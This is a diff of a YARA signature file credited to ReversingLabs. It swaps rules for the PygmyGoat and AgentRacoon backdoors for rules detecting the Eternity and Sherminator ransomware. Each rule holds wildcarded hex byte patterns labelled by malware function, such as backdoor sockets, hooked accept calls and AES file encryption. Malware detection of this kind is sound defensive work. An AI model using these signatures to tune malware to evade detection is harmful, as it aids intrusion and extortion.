+            ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ??
+            ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40
+            89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8
+            ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF
+            33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66
+            3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ??
+            ?? ?? E9
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( all of ( $handle_c2_commands_p* ) ) and ( all of ( $create_cab_file_and_upload_p* ) ) and ( $cmd_expand_payload )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $search_and_encrypt_* ) ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Pygmygoat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Eternity : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects PygmyGoat backdoor."
+		description = "Yara rule that detects Eternity ransomware."
 		author = "ReversingLabs"
-		id = "c6ffe84d-c1ae-5856-bd49-4633b049f95c"
-		date = "2025-01-20"
-		modified = "2025-01-20"
+		id = "7bb0f3b0-a8c0-5239-a1b4-532d403f59bc"
+		date = "2022-07-22"
+		modified = "2022-07-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.PygmyGoat.yara#L1-L135"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Eternity.yara#L1-L74"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "11e076865bfc72b79ca42ca821e4c1d81ea705f3ba7711be8677b648ada859a1"
+		logic_hash = "a2298a26e9bbe2b779eb2afeeda28d4321bc2d26db46bbb377bf86abaf8fa929"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "PygmyGoat"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Eternity"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$create_backdoor_socket = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 30 89 74 08 ?? 8D 50 ?? 83 E2 ?? 29 D0 01 C1 83
-            E1 ?? C1 E9 ?? 89 D7 89 F0 F3 AB 83 EC ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ??
-            8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
-            C0 ?? 89 45 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? 83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D
-            ?? ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            83 EC ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ??
-            ?? ?? C6 40 ?? ?? 83 EC ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            66 C7 85 ?? ?? ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 83 C0 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83
-            C0 ?? 89 45 ?? 83 EC ?? 6A ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 74 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ??
-            83 EC ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 79 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? EB ?? 8B 45 ?? 8D
-            65 ?? 5B 5E 5F 5D C3
-        }
-		$backdoor_dataforward_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? BE ?? ?? ?? ??
-            BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 D1 89 C2 89 D7 89 F0 FC F3 AB 89 FA 89 4D ?? 89
-            55 ?? 8B 45 ?? 39 45 ?? 0F 4D 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 0F 88 ?? ?? ?? ??
-            83 7D ?? ?? 0F 88 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ??
-            ?? ?? 8B 45 ?? C1 E8 ?? 8B 55 ?? 83 E2 ?? 0F AB 94 85 ?? ?? ?? ?? 83 EC ?? 6A ?? 6A
-            ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
-            79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83
-            E0 ?? 8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ??
-            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ??
-            ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
-        }
-		$backdoor_dataforward_p2 = {
-            C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 E0 ??
-            8B 55 ?? C1 EA ?? 0F A3 84 95 ?? ?? ?? ?? 0F 92 C0 89 C6 89 F0 84 C0 0F 84 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? 83 7D ?? ?? 79 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00
-            83 F8 ?? 75 ?? EB ?? EB ?? 83 7D ?? ?? 75 ?? EB ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E8 ?? ??
-            ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? EB ?? EB ?? E9
-            ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? B8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3
+		$find_files = {
+            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 0C 2B ?? 08
+            6F ?? ?? ?? ?? 0D 09 03 04 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F
+            ?? ?? ?? ?? DC 02 28 ?? ?? ?? ?? 0B 07 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13
+            ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
+            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ??
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 03 04 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58
+            13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
         }
-		$main_constructor = {
-            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 89 45 ?? 8D
-            83 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 EC ?? 6A ?? 8D 45 ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 50
-            8D 83 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 83 EC ?? FF 75
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B 45 ?? 83 F8 ?? 77 ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C2 89 D0 83 EC ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 83 EC ?? 68 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 83 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85 C0 79 ?? E9 ?? ?? ?? ?? 8B 83 ?? ?? ?? ??
-            83 EC ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 79 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 83 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C2 8B 83 ?? ?? ?? ?? 83 EC ?? 52 8D 55 ?? 52 50 E8 ??
-            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 75 ?? 83 EC
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 EC ?? 8D 83 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ??
-            ?? 8B 83 ?? ?? ?? ?? 83 EC ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? C9 C3
+		$encrypt_files = {
+            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0A 02
+            28 ?? ?? ?? ?? 0B 07 06 28 ?? ?? ?? ?? 0C 02 19 28 ?? ?? ?? ?? 0D 09 16 6A 6F ?? ?? ??
+            ?? 09 6F ?? ?? ?? ?? 02 1C 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ??
+            08 16 08 8E 69 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F
+            ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 2A
         }
-		$hook_accept_function_p1 = {
-            55 89 E5 53 83 EC ?? E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 EC ?? 8D 83 ?? ?? ?? ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? 8B 45 ?? 8B 00 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC
-            ?? FF 75 ?? FF 75 ?? FF 75 ?? 8B 45 ?? FF D0 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9
-            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 94 C0
-            0F B6 C0 89 45 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 81 65 ?? ?? ?? ?? ?? 83 EC ?? 6A
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? EB ?? 6A ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
-            7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 83 EC ?? 50 8D 83 ?? ?? ?? ??
-            50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? EB
-            ?? 83 EC ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 83 7D ?? ?? 76
+		$aes_encrypt = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 73 ?? ??
+            ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ??
+            ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11
+            ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ??
+            09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 2A
         }
-		$hook_accept_function_p2 = {
-            83 7D ?? ?? 76 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ?? ??
-            ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? E9 ??
-            ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
-            45 ?? 3B 45 ?? 75 ?? EB ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 45 ?? ?? 81
-            7D ?? ?? ?? ?? ?? 7E ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? FF 75 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 79 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 EC
-            ?? 6A ?? E8 ?? ?? ?? ?? 83 EC ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? 6A ?? E8
-            ?? ?? ?? ?? 83 EC ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 00 83 EC ?? 50 6A ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 89 10 83 EC ?? FF 75 ?? FF 75 ?? FF 75 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 45 ?? 8B 5D ?? C9 C3
+		$encrypt_pass = {
+            72 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 0B D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C
+            08 07 6F ?? ?? ?? ?? A5 ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 09 6F ?? ?? ?? ?? 7E
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ??
+            16 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( $create_backdoor_socket ) and ( all of ( $backdoor_dataforward_p* ) ) and ( $main_constructor ) and ( all of ( $hook_accept_function_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $aes_encrypt ) and ( $encrypt_pass )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Agentracoon : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects AgentRacoon backdoor."
+		description = "Yara rule that detects Sherminator ransomware."
 		author = "ReversingLabs"
-		id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6"
-		date = "2023-12-15"
-		modified = "2023-12-15"
+		id = "99792a22-8027-557f-927f-30eac4d1e690"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9"
+		logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "AgentRacoon"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sherminator"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$unpack_response_p1 = {
-            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ??
-            ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73
-            ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ??
-            ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B
-            03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28
-            ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09
-            8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12
-            ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ??
-            7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ??
-            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
-            ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ??
-            ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ??
-            ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ??
-            ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11
-            ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18
+		$enum_resources_p1 = {
+            55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24
+            ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ??
+            ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54
+            24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89
+            45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89
         }
-		$unpack_response_p2 = {
-            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ??
-            ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ??
-            ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ??
-            ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ??
-            ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B
-            ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28
-            ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E
-            02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ??
-            8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ??
-            28 ?? ?? ?? ?? 2A
+		$enum_resources_p2 = {
+            45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
+            ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
